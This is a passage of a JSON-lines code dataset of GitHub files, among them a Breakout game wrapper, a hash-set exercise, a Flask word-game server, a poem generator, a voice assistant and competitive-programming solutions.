print(message)\n        ws.send('not an effective command')\n        return\n\n\ndef on_error(self, error):\n    print(error)\n\n\ndef on_close(self):\n    print(\"ConnectionClosed...\")\n\n\ndef on_open(self):\n    ws.send(\"admin\")\n    print(\"ConnectionStarted...\")\n\n\nif __name__ == '__main__':\n    url = \"ws://localhost:10086\"\n    while True:\n        try:\n            websocket.enableTrace(True)\n            ws = websocket.WebSocketApp(url,\n                                        on_open=on_open,\n                                        on_message=on_message,\n                                        on_error=on_error,\n                                        on_close=on_close)\n            ws.run_forever()\n        except Exception as e:\n            print(e)\n            continue\n","repo_name":"sjjl0/remoteCar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16483839814","text":"# If the size of list a is N, what is the time complexity of the code below?\ndef proob3(a: list[int]):\n    answer = []\n    for x in a:\n        b = list(map(lambda b: b**x, a))\n        print(b)\n        for y in b:\n            print(set(a))\n            if y in set(a):\n                answer += y # error occurs here (cannot add an int to a list)\n    return answer\nprint(proob3([2,3,5,7]))\n# Answer: O(N^2)\n\n# Exercise: write code that guards against hash collisions.\nclass HashSet:\n    def __init__(self, table_size = 16, hash_fnc = None):\n        if hash_fnc is None:\n            self.hash_fnc = hash\n        else:\n            self.hash_fnc = hash_fnc\n        \n        self.table_size = table_size\n        self.table = [None]*table_size\n        \n    def add(self, data):\n        ind = self.hash_fnc(data) % self.table_size\n        if self.table[ind] is None or self.table[ind] == data:\n            self.table[ind] = data\n        else:\n            # Collision handling (linear probing): when self.table[ind] already holds another value,\n            while self.table[ind]:\n                ind = (ind+1) % self.table_size\n            self.table[ind] = data\n        return \n    def search(self, data):\n        ind = self.hash_fnc(data) % self.table_size\n        prob_ind = ind\n        while self.table[prob_ind]:\n            print('going on')\n            if self.table[prob_ind] == data:\n                print('found in index: ', prob_ind)\n                return True\n            prob_ind = (prob_ind + 1) % self.table_size\n            # If we have probed all the way around the table... 
\n            if prob_ind == ind:\n                break\n\n        # If there is no value at that hash address, return False\n        return False\n\n# hs = HashSet(4)\n# print(hs.table_size)\n# print(hs.table)\n# ind1 = hash('da') % 4\n# ind2 = hash('ak') % 4\n# ind3 = hash('dc') % 4\n# ind4 = hash('dqwe') % 4\n# print(ind1,ind2,ind3,ind4)\n# hs.add('da')\n# print(hs.table)\n# hs.add('ak')\n# print(hs.table)\n# hs.add('dc')\n# print(hs.table)\n# hs.add('dqwe')\n# print(hs.table)\n# hs.search('da')\n# hs.search('ak')\n# hs.search('dc')\n# hs.search('dqwe')","repo_name":"devThinKoki/learning_repo","sub_path":"FASTCAMPUS/NKLCB/2nd/quiz-test/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18072161027","text":"import numpy as np\nimport pickle\nfrom ale_python_interface import ALEInterface\nfrom scipy.misc import imresize, imsave\n\nnp.set_printoptions(linewidth=np.inf)\nnp.set_printoptions(threshold=np.inf)\n\n\nclass Game:\n    def __init__(self, state_height, state_width, display_screen=False):\n        self.ale = ALEInterface()\n        self.ale.setInt(b\"frame_skip\", 4)\n        self.ale.setInt(b\"random_seed\", 123)\n        self.ale.setBool(b\"display_screen\", display_screen)\n        
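# Load the Breakout ROM; the path is resolved relative to the working directory.\n        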
self.ale.loadROM(b\"roms/breakout.bin\")\n        self.actions = self.ale.getMinimalActionSet()\n        self.score = 0\n        self.actions_len = len(self.actions)\n        self.screen_width, self.screen_height = self.ale.getScreenDims()\n        self.state_width = state_width\n        self.state_height = state_height\n        self.state_len = self.state_width * self.state_height\n        self.make_move(self.actions[0])\n        self.make_move(self.actions[1])\n\n    def get_state(self):\n        screen_data = np.zeros(self.screen_width*self.screen_height,dtype=np.uint8)\n        self.ale.getScreen(screen_data)\n        screen_data_2D = np.reshape(screen_data, (self.screen_height, self.screen_width))\n        resized_screen_data_2D = imresize(\n            screen_data_2D, (self.state_height, self.state_width))\n        resized_screen_data = np.reshape(\n            resized_screen_data_2D, self.state_width * self.state_height)\n        return resized_screen_data.astype(dtype=np.float32) / 255.0\n\n    def get_state_dims(self):\n        return (self.state_width, self.state_height, 1)\n\n    def save_state_to_img(self, fn):\n        screen_data = np.zeros(self.screen_width*self.screen_height,dtype=np.uint8)\n        self.ale.getScreen(screen_data)\n        screen_data_2D = np.reshape(screen_data, (self.screen_height, self.screen_width))\n        resized_screen_data_2D = imresize(\n            screen_data_2D, (self.state_height, self.state_width))\n        imsave(fn, resized_screen_data_2D)\n    \n    def make_move(self, action):\n        r = self.ale.act(action)\n        self.score += r\n        return r\n\n    def reset_game(self):\n        self.ale.reset_game()\n        self.score = 0\n        self.make_move(self.actions[0])\n\n    def game_over(self):\n        return self.ale.game_over()\n\n    def play(self):\n        while True: \n            while not self.game_over():\n                self.make_move(self.actions[np.random.randint(0, len(self.actions))])\n            print(\"Game Over! Score: %s\" % self.score)\n            self.reset_game()\n\n    def play_interactive(self):\n        \"\"\"\n        play using 0,1,2,3\n        save using 8\n        \"\"\"\n        buf = []\n        while True:\n            S = self.get_state()\n            a = int(input())\n            if(a == 8):\n                with open(\"data.pickle\", \"wb\") as f:\n                    pickle.dump(buf, f)\n                break\n            if(a > 3 or a is None):\n                continue\n            r = self.make_move(self.actions[a])\n            S_ = self.get_state()\n            terminal = self.game_over()\n            if terminal:\n                self.reset_game()\n            buf.append((S, a, r, S_, terminal))\n\nif __name__ == \"__main__\":\n    g = Game(84, 84, False)\n    g.play_interactive()\n","repo_name":"vojtechcima/drl-breakout","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"23727991045","text":"def hello(name):\n    newList = []\n    name = name.split()\n    for item in name:\n        newList.append(int(item))\n    maxlist = max(newList)\n    minlist = min(newList)\n    indexMin = newList.index(minlist)\n    indexMax = newList.index(maxlist)\n    newList[indexMin] = maxlist\n    newList[indexMax] = minlist\n    return newList","repo_name":"kriba24/cs-coding-backup","sub_path":"Unit 8/Replit Problem Set/Swap Min and Max.py","file_name":"Swap Min and Max.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"33999134589","text":"#!/usr/bin/env python3\n# https://atcoder.jp/contests/arc134/tasks/arc134_a?lang=ja\nimport bisect  # noqa: F401\nimport heapq  # noqa: F401\nimport math  # noqa: F401\nimport sys  # noqa: F401\nfrom collections import defaultdict, deque  # noqa: F401\nfrom functools import lru_cache  # noqa: F401\nfrom itertools import (accumulate, combinations,  # noqa: F401\n                        combinations_with_replacement, 
groupby, permutations,\n                        product)\nfrom typing import *  # noqa: F401\n\ninput = (lambda: sys.stdin.readline().rstrip(\"\\r\\n\"))\n\n\n\ndef chmax(a: Any, b: Any) -> Tuple[Any, bool]:\n    if (a < b):\n        a = b  # update a with b\n        return (a, True)\n    return (a, False)\n\n\ndef chmin(a: Any, b: Any) -> Tuple[Any, bool]:\n    if (a > b):\n        a = b  # update a with b\n        return (a, True)\n    return (a, False)\n\ndef get_need_num(pre, next_, W):\n    if next_ < 0:\n        return 0\n    if pre > next_:\n        return 0\n\n    tmp = -(-(next_ - pre) // W)\n    return tmp\n\n\ndef solve(N: int, L: int, W: int, a: \"List[int]\"):\n    pre_empty_index = 0\n    next_empty_index = 0\n    ans = 0\n    for i in range(N):\n        next_empty_index = a[i]+W\n        ans += get_need_num(pre_empty_index, a[i], W)\n        pre_empty_index = next_empty_index\n\n    ans += get_need_num(pre_empty_index, L, W)\n    print(ans)\n    return\n\n\ndef main():\n    def iterate_tokens():\n        for line in sys.stdin:\n            for word in line.split():\n                yield word\n    tokens = iterate_tokens()\n    N = int(next(tokens))  # type: int\n    L = int(next(tokens))  # type: int\n    W = int(next(tokens))  # type: int\n    a = [int(next(tokens)) for _ in range(N)]  # type: \"List[int]\"\n    solve(N, L, W, a)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"come2ry/kyopro","sub_path":"Contests/arc134/A/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"35223789433","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom math import sqrt\n\nemin = 1\nemax = 150\nn_bins = 50\n\ndef get_invmass_from_data( data ):\n\n    # invariant mass is \n    # sqrt( m1^2 + m2^2 + 2*(E1*E2 - p1\\dot p2) ), with p1\\dot p2 the 3-momentum dot product\n    m1sq = np.array([ evt[5]**2 - evt[2]**2 - evt[3]**2 - evt[4]**2 for evt in data])\n    m2sq = np.array([ evt[11]**2 -evt[10]**2 -evt[9]**2 - evt[8]**2 for evt in data])\n    p1dp2 = 2*np.array([ evt[11]*evt[5] - evt[2]*evt[8] - evt[3]*evt[9] - evt[4]*evt[10] for evt in data])\n\n    invmass = np.sqrt(m1sq + m2sq + p1dp2)\n\n    return(invmass)\n\ndef plot_files(files):\n\n    for each in files:\n        if not os.path.exists(each):\n            print(\"File '{}' does not exist, skipping\".format(each))\n            continue\n\n        # load the event\n        data = np.loadtxt(each)\n        invmass = get_invmass_from_data(data)\n\n        bins = np.logspace(np.log10(emin), np.log10(emax), n_bins+1)\n#        bins = np.linspace(emin, emax, n_bins+1)\n\n        plt.hist(invmass, bins,alpha=0.5, label=each.split(\".\")[0])\n\n    plt.legend()\n    plt.title(\"Ben's Plot - Do Not Steal\")\n    plt.xlabel(\"Invariant Mass [GeV]\",size=14)\n    plt.ylabel(\"Counts\",size=14)\n    plt.xscale('log')\n    plt.yscale('log')\n    plt.show()\n    plt.close()\n\n# load in flavor pairs\nfiles_flavor = [\"mu_el.txt\", \"two_el.txt\", \"two_mu.txt\"]\n\nfiles_sign = [\"same_sign.txt\", \"opp_sign.txt\"]\n\nplot_files(files_flavor)\nplot_files(files_sign)\n\n","repo_name":"BenSmithers/Analysis","sub_path":"summer_camp/lesson5.py","file_name":"lesson5.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16897884611","text":"class Checkin(object):\n    def __init__(self):\n        super(Checkin, self).__init__()\n        self.id = None\n        self.name = None\n        self.latitude = None\n        self.longitude = None\n        self.when = None\n\n    @classmethod\n    def from_dict(cls, a_dict):\n        it = Checkin()\n        it.id = a_dict['id']\n        it.name = a_dict['name']\n        it.latitude = a_dict['latitude']\n        it.longitude = a_dict['longitude']\n        it.when = 
a_dict['when']\n return it\n","repo_name":"dkoepke/checkin","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25729636079","text":"import os\nimport get_poems\nimport gensim\nimport pymorphy2\nimport json\nimport random\n\n# path to check if get_poems has already been done.\npath = './resources/json/poems.json'\nfile = 'resources/json/poems.json'\n\n# list of parts of speech that we don't change\nSTOP_POS = ['CONJ', 'PREP', 'PRCL', 'NPRO', ]\n\n# dict to translate OpenCorpora tags to Universal Tags format (Pymorphy -> model)\nOC_UT_dict = {\n 'ADVB': 'ADV',\n 'NUMR': 'NUM',\n 'ADJF': 'ADJ',\n 'ADJS': 'ADJ',\n 'INFN': 'VERB',\n 'COMP': 'ADV',\n 'PRTF': 'VERB',\n 'PRTS': 'VERB',\n 'GRND': 'VERB',\n 'PRED': 'ADV',\n 'NPRO': 'NOUN'\n}\n\npoems_new = []\n\nif not (os.path.exists(path) and os.path.isfile(file)):\n get_poems.makeFiles()\n\n# get results from previous steps\nwith open(file, 'r') as f:\n poems = json.load(f)\n\nwith open('resources/json/poems_clean.json', 'r') as f:\n poems_clean = json.load(f)\n\n# initialize model and PM analyzer\nmodel = gensim.models.KeyedVectors.load_word2vec_format('resources/model.bin', binary=True)\nmodel.init_sims(replace=True)\n\nmorph = pymorphy2.MorphAnalyzer()\n\n\n# returns a list of similar lemmas from model. If can't find, returns None.\ndef findSimilar(lemma, pos):\n try:\n similar = model.most_similar(lemma)\n # filters similar to get only those words that have the same part of speech\n words = [x[0] for x in similar if x[0].endswith(str(pos))]\n return words\n except:\n # print(lemma, 'is not found')\n return None\n\n\n# gets a word in a particular form and returns most similar in the same form\ndef replace_word(word):\n parsed = morph.parse(word)[0]\n tag = parsed.tag\n pos_oc = str(tag.POS)\n\n # Check if we need to replace that word:\n if pos_oc not in STOP_POS:\n\n # translate it to UT format\n if pos_oc in OC_UT_dict.keys():\n pos_ut = OC_UT_dict[pos_oc]\n else:\n pos_ut = pos_oc\n\n # create lemma\n lemma = str(parsed.normal_form) + '_' + pos_ut\n similars = findSimilar(lemma, pos_ut)\n if similars:\n for similar in similars:\n # gets the normal form of the word\n similar = similar.split('_')[0]\n\n # translate tag from analyzers form to generator form\n new_tag = translate_tag(tag)\n\n # put similar word to initial form\n similar_parsed = morph.parse(similar)[0]\n new_word = similar_parsed.inflect(frozenset(new_tag))\n\n # if successfully, return it\n if new_word:\n return new_word.word\n return None\n else:\n return None\n else:\n return None\n\n\n# simply cast string splitted by commas and spaces to list\ndef translate_tag(tag):\n tag = str(tag).split(' ')\n new_tag = []\n for x in tag:\n new_tag.extend(x.split(','))\n return new_tag\n\n\n# for every poem, we take according poem cleaned, and for every word we try to replace it.\ndef makeNewPoems():\n for i in range(len(poems)):\n poem = poems[i]\n for word in poems_clean[i].split(' '):\n # check if it is a word\n if str.isalpha(word):\n new_word = replace_word(word)\n if new_word:\n # If initial word was capitalized, we capitalize the new word\n if word[0].isupper():\n new_word = new_word.capitalize()\n poem = poem.replace(word, new_word)\n poems_new.append(poem)\n # put all new poem to the json file\n with open('resources/json/poems_new.json', 'w', encoding='utf8') as f:\n json.dump(poems_new, f, ensure_ascii=False)\n\n\n# 
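The eager call below is left commented out: getTwoPoems() regenerates poems_new.json on demand.\n# 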
makeNewPoems()\n\n# returns a random original poem and a generated one.\ndef getTwoPoems():\n    if not (os.path.exists('./resources/json/poems_new.json') and os.path.isfile('./resources/json/poems_new.json')):\n        makeNewPoems()\n    with open('resources/json/poems_new.json', 'r') as f:\n        poems_new = json.load(f)\n    i = random.randint(0, len(poems) - 1)\n    return poems[i], poems_new[i]\n","repo_name":"shitikovaev/Khlebnikov_bot","sub_path":"generate_poems.py","file_name":"generate_poems.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"40810346355","text":"from datetime import datetime\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nimport wikipedia\r\n\r\nengine = pyttsx3.init(\"sapi5\")\r\nvoice = engine.getProperty(\"voices\")\r\n#print(voice[0].id)\r\nengine.setProperty('voice',voice[1].id)\r\n\r\n\r\ndef speak(audio):\r\n    engine.say(audio)\r\n    engine.runAndWait()\r\ndef wishme():\r\n    hour = int(datetime.now().hour)\r\n    if hour>=0 and hour<12:\r\n        speak(\"Good morning!\")\r\n    elif hour>=12 and hour<18:\r\n        speak(\"Good Afternoon!\")\r\n    else:\r\n        speak(\"Good Evening!\")\r\n\r\n    speak(\"I am your robot sir. Please tell me how can I help you\")\r\ndef takecommand():\r\n    '''Take microphone input from the user and return it as a string.'''\r\n\r\n    r = sr.Recognizer()\r\n    with sr.Microphone() as source:\r\n        print(\"Listening....\")\r\n        r.pause_threshold = 1\r\n        audio = r.listen(source)\r\n    try:\r\n        print(\"Recognizing...\")\r\n        query = r.recognize_google(audio,language=\"en-in\")\r\n        print(f\"user said: {query}\\n\")\r\n    except Exception as e:\r\n        #print(e)\r\n\r\n        print(\"say that again please....\")\r\n        return \"None\"\r\n    return query\r\nif __name__==\"__main__\":\r\n    wishme()\r\n    while True:\r\n        query = takecommand().lower()\r\n\r\n        #logic for executing tasks based on query\r\n        if 'wikipedia' in query:\r\n            speak('Searching wikipedia..')\r\n            query = query.replace('wikipedia','')\r\n            results = wikipedia.summary(query, sentences=2)\r\n            speak('According to wikipedia')\r\n            print(results)\r\n            speak(results)","repo_name":"cadmostafijur/My-Created-Apps","sub_path":"jarves.py","file_name":"jarves.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"73421679849","text":"import numpy as np\nimport pandas as pd\n\n\ndef design_matrix(X):\n    \"\"\"\n    np.array X\n    add 1.0 in each line\n\n    return matrix of shape(n * (1+p))\n    \"\"\"\n    n, p = X.shape\n    mat = np.ones((n, 1))\n    return np.c_[mat, X]\n\n\ndef sigmoid(x):\n    \"\"\"\n    np.array x\n    \"\"\"\n    return 1 / (1 + np.exp(-x))\n\n\ndef gradient_ascent(design_mat, y):\n    labels = y[:, np.newaxis]\n    \n    alpha = 0.001\n    max_iter = 500\n    n, p = design_mat.shape\n    weights = np.ones((p, 1))\n    # vectorization\n    for i in range(max_iter):\n        # w_j := w_j - alpha * sigma((sigmoid(w.T*x_i) - y) * x_j)\n        # descent: w := w - alpha * X.T * (sigmoid(X*w) - y)\n        # ascent: w := w + alpha * X.T * (y - sigmoid(X*w)) \n        h = sigmoid(design_mat.dot(weights))\n        error = labels - h\n        weights = weights + alpha * design_mat.T.dot(error)\n    \n    return weights\n\n\ndef learning_schedule(t):\n    t0, t1 = 5, 50\n    return t0 / (t + t1)\n\n\ndef stochastic_gradient_ascent(design_mat, y, max_iter = 500):\n    n, p = design_mat.shape\n    weights = 
np.ones(p)\n\n    for i in range(max_iter):\n        for j in range(n):\n            alpha = learning_schedule(i * n + j)\n            idx = np.random.randint(n)\n            x = design_mat[idx] # design_mat[idx, :]\n            label = y[idx]\n            h = sigmoid(x[np.newaxis, :].dot(weights))\n            weights = weights + alpha * x * (label - h)\n\n    return weights\n\n\n\ndef main():\n    df = pd.read_csv(test_set, sep=\"\\t\", header=-1)\n    X = df[df.columns[:2]]\n    y = df[df.columns[-1]]\n    design_mat = design_matrix(X)\n    weights = gradient_ascent(design_mat, y)\n\n\nif __name__ == \"__main__\":\n    test_set = \"F:/MLA/logistic_regression/test_set.txt\"\n    main()","repo_name":"chenqumi/MLA","sub_path":"logistic_regression/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19024480208","text":"# ways to access a particular character of a string.\nimport os\nos.system(\"cls\")\nx= input(\"Enter the string:- \")\n# y= input(\"Enter another string:- \")\n# for i in range(len(x)):\n#     if x[i]==y[i]:\n#         y= y[0:i]+\"0\"+y[i+1:]   # Slicing.\n# print(y)\nx= x.split()\nprint(x[1][1])","repo_name":"Awesome-Abhay/Python-Programs","sub_path":"new20.py","file_name":"new20.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"9343737800","text":"\"\"\"\nConvert a Matlab matrix file (like those found at sparse.tamu.edu) to scipy sparse .npz file.\n\"\"\"\n\nimport numpy as np\nimport scipy.io\nfrom scipy.sparse import save_npz\n\n\ndef matlab2npy(mlfile):\n    d = scipy.io.loadmat(mlfile)\n\n    for i in [1, 2, 0]:\n        a = d[\"Problem\"][0][0][i]\n        try:\n            a.data = np.abs(a.data)\n        except Exception:\n            continue\n        else:\n            break\n    else:\n        raise RuntimeError(\"couldn't find the matrix!!!\")\n\n\n    nrows, ncols = a.shape\n\n    print(\"Nonzeros:\", np.count_nonzero(a.data), \"of\", nrows * ncols)\n    print(\"Max:\", a.data.max())\n    print(\"Min nonzero:\", a.data[a.data > 0.].min())\n    print(\"Shape:\", a.shape)\n\n    return a\n\n\nif __name__ == '__main__':\n    import sys, os\n\n    a = matlab2npy(sys.argv[1])\n    base = os.path.splitext(sys.argv[1])[0]\n    save_npz('{}.npz'.format(base), a)\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/test_suite/matrices/ml2np.py","file_name":"ml2np.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"}
{"seq_id":"38410893365","text":"from flask import Flask, jsonify, render_template\nfrom flask_cors import CORS, cross_origin\nfrom game_state import GameState\nfrom todays_letter_bank import todays_target_sentence_letter_bank, todays_target_sentence\n\napp = Flask(__name__)\nCORS(app)\n# the game state is a singleton\nGS = GameState(_target_sentence=\"the best things in life are free\")\n\n\n@app.route('/_ah/warmup')\ndef warmup():\n    return '', 200\n\n\n@app.route('/')\n@cross_origin()\ndef index():\n    return render_template('/site/index.html')\n\n\n@app.route('/player_state/<player_id>', methods=['GET'])\n@cross_origin()\ndef get_player_state(player_id):\n    return GS.get_player_state(player_id).to_json()\n\n\n@app.route('/letter_bank', methods=['GET'])\n@cross_origin()\ndef get_todays_target_sentence_letter_bank():\n    return jsonify(todays_target_sentence_letter_bank())\n\n\n@app.route('/target_sentence', methods=['GET'])\n@cross_origin()\ndef get_todays_target_sentence():\n    return 
jsonify(todays_target_sentence())\n\n\n@app.route('/submit_guess/<player_id>/<guess_entry>', methods=['GET'])\n@cross_origin()\ndef submit_guess(player_id, guess_entry):\n guess_entry = guess_entry.replace(\"+\", \" \")\n print(\"submit_guess: player_id: \" +\n player_id + \" guess_entry: \" + guess_entry)\n guess_score, guess_correct_words, letter_points, p_state, validity_complaint = GS.process_guess(\n player_id, guess_entry)\n return jsonify({\"guess_score\": guess_score, \"guess_correct_words\": guess_correct_words, \"letter_points\": letter_points, \"p_state\": p_state.to_json(), \"validity_complaint\": validity_complaint})\n\n\ndef main(request):\n from flask import request\n\n if request.path.startswith('/'):\n request.path = request.path[1:]\n\n with app.request_context(request.environ):\n try:\n response = app.preprocess_request()\n if response is None:\n response = app.dispatch_request()\n response = app.make_response(response)\n response = app.process_response(response)\n return response\n except Exception as e:\n response = app.handle_exception(e)\n return response\n\n\nif __name__ == '__main__':\n # game_state = GameState(_target_sentence=\"the best things in life are free\")\n ip = '0.0.0.0'\n port = 5000\n # app.run(host=ip, port=port, debug=True)\n app.run(host=ip, port=port, debug=True)\n","repo_name":"OliverBarbeau/sentencer","sub_path":"src/game-server/game_server.py","file_name":"game_server.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33937797275","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@Project :deskTip \n@File :AddDialog.py\n@Author :Aidan Lew\n@Date :2022/10/3 21:38 \n\"\"\"\n\nfrom PyQt5.QtWidgets import (\n QDialog,\n QVBoxLayout,\n QLabel,\n QLineEdit,\n QHBoxLayout,\n QPushButton)\n\n\nclass AddDialog(QDialog):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n self.setWindowTitle(\"编辑待办事项\")\n\n self.buttonBox = QHBoxLayout()\n button_1 = QPushButton(\"确定\")\n button_1.clicked.connect(self.get_info)\n button_1.clicked.connect(self.accept)\n button_2 = QPushButton(\"取消\")\n button_2.clicked.connect(self.reject)\n self.buttonBox.addWidget(button_1)\n self.buttonBox.addWidget(button_2)\n\n self.layout = QVBoxLayout()\n message = QLabel(\"请填写待办事项:\")\n name_layout = QHBoxLayout()\n name = QLabel(\"事项(请简略):\")\n self.name_info = QLineEdit()\n self.name_info.setObjectName(\"item_name\")\n name_layout.addWidget(name)\n name_layout.addWidget(self.name_info)\n link_layout = QHBoxLayout()\n link = QLabel(\"超链接(可无):\")\n self.link_info = QLineEdit()\n self.link_info.setObjectName(\"link\")\n link_layout.addWidget(link)\n link_layout.addWidget(self.link_info)\n\n self.layout.addWidget(message)\n self.layout.addLayout(name_layout)\n self.layout.addLayout(link_layout)\n self.layout.addLayout(self.buttonBox)\n self.setLayout(self.layout)\n\n self.name_s = None\n self.link_s = None\n\n # The values can only be captured in the button handler; otherwise the main window cannot read them\n def get_info(self):\n self.name_s = self.name_info.text()\n if \"http\" in self.link_info.text() or \"https\" in self.link_info.text():\n self.link_s = self.link_info.text()\n else:\n self.link_s = self.link_info.text().replace(\"\\\\\", \"\\\\\\\\\")\n","repo_name":"AL-377/DeskTip","sub_path":"deskTip/dialogs/AddDialog.py","file_name":"AddDialog.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"9772628711","text":"\"\"\"Modules in the 
standard library.\"\"\"\nfrom typing import Iterable, List, Tuple\n\n\n# Modules that come with the standard library in Python 2.7\nSTD_LIB_27 = [\n '__builtin__', '__future__', '__main__', '_winreg',\n 'abc', 'aepack', 'aetools', 'aetypes', 'aifc', 'al', 'AL', 'anydbm', 'applesingle', 'argparse', 'array', 'ast', 'asynchat', 'asyncore', 'atexit', 'audioop', 'autoGIL',\n 'base64', 'BaseHTTPServer', 'Bastion', 'bdb', 'binascii', 'binhex', 'bisect', 'bsddb', 'buildtools', 'bz2',\n 'calendar', 'Carbon', 'cd', 'cfmfile', 'cgi', 'CGIHTTPServer', 'cgitb', 'chunk', 'cmath', 'cmd', 'code', 'codecs', 'codeop', 'collections', 'ColorPicker', 'colorsys', 'commands', 'compileall', 'compiler', 'ConfigParser', 'contextlib', 'Cookie', 'cookielib', 'copy', 'copy_reg', 'cPickle', 'cProfile', 'crypt', 'cStringIO', 'csv', 'ctypes', 'curses',\n 'datetime', 'dbhash', 'dbm', 'decimal', 'DEVICE', 'difflib', 'dircache', 'dis', 'distutils', 'dl', 'doctest', 'DocXMLRPCServer', 'dumbdbm', 'dummy_thread', 'dummy_threading',\n 'EasyDialogs', 'email', 'encodings', 'ensurepip', 'errno', 'exceptions',\n 'fcntl', 'filecmp', 'fileinput', 'findertools', 'fl', 'FL', 'flp', 'fm', 'fnmatch', 'formatter', 'fpectl', 'fpformat', 'fractions', 'FrameWork', 'ftplib', 'functools', 'future_builtins',\n 'gc', 'gdbm', 'gensuitemodule', 'getopt', 'getpass', 'gettext', 'gl', 'GL', 'glob', 'grp', 'gzip',\n 'hashlib', 'heapq', 'hmac', 'hotshot', 'htmlentitydefs', 'htmllib', 'HTMLParser', 'httplib',\n 'ic', 'icopen', 'imageop', 'imaplib', 'imgfile', 'imghdr', 'imp', 'importlib', 'imputil', 'inspect', 'io', 'itertools',\n 'jpeg', 'json',\n 'keyword',\n 'lib2to3', 'linecache', 'locale', 'logging',\n 'macerrors', 'MacOS', 'macostools', 'macpath', 'macresource', 'mailbox', 'mailcap', 'marshal', 'math', 'md5', 'mhlib', 'mimetools', 'mimetypes', 'MimeWriter', 'mimify', 'MiniAEFrame', 'mmap', 'modulefinder', 'msilib', 'msvcrt', 'multifile', 'multiprocessing', 'mutex',\n 'Nav', 'netrc', 'new', 'nis', 'nntplib', 'numbers',\n 'operator', 'optparse', 'os', 'ossaudiodev',\n 'parser', 'pdb', 'pickle', 'pickletools', 'pipes', 'PixMapWrapper', 'pkgutil', 'platform', 'plistlib', 'popen2', 'poplib', 'posix', 'posixfile', 'pprint', 'profile', 'pstats', 'pty', 'pwd', 'py_compile', 'pyclbr', 'pydoc',\n 'Queue', 'quopri',\n 'random', 're', 'readline', 'resource', 'rexec', 'rfc822', 'rlcompleter', 'robotparser', 'runpy',\n 'sched', 'ScrolledText', 'select', 'sets', 'sgmllib', 'sha', 'shelve', 'shlex', 'shutil', 'signal', 'SimpleHTTPServer', 'SimpleXMLRPCServer', 'site', 'smtpd', 'smtplib', 'sndhdr', 'socket', 'SocketServer', 'spwd', 'sqlite3', 'ssl', 'stat', 'statvfs', 'string', 'StringIO', 'stringprep', 'struct', 'subprocess', 'sunau', 'sunaudiodev', 'SUNAUDIODEV', 'symbol', 'symtable', 'sys', 'sysconfig', 'syslog',\n 'tabnanny', 'tarfile', 'telnetlib', 'tempfile', 'termios', 'test', 'textwrap', 'thread', 'threading', 'time', 'timeit', 'Tix', 'Tkinter', 'token', 'tokenize', 'trace', 'traceback', 'ttk', 'tty', 'turtle', 'types',\n 'unicodedata', 'unittest', 'urllib', 'urllib2', 'urlparse', 'user', 'UserDict', 'UserList', 'UserString', 'uu', 'uuid',\n 'videoreader',\n 'W', 'warnings', 'wave', 'weakref', 'webbrowser', 'whichdb', 'winsound', 'wsgiref',\n 'xdrlib', 'xml', 'xmlrpclib',\n 'zipfile', 'zipimport', 'zlib'\n]\n\n# New modules introduced in Python 3.5+\nSTD_LIB_35 = [\n '_dummy_thread', '_thread',\n 'asyncio', 'builtins', 'concurrent', 'configparser', 'copyreg', 'enum', 'faulthandler',\n 'html', 'http', 'ipaddress', 'lzma',\n 'pathlib', 'queue', 'reprlib', 
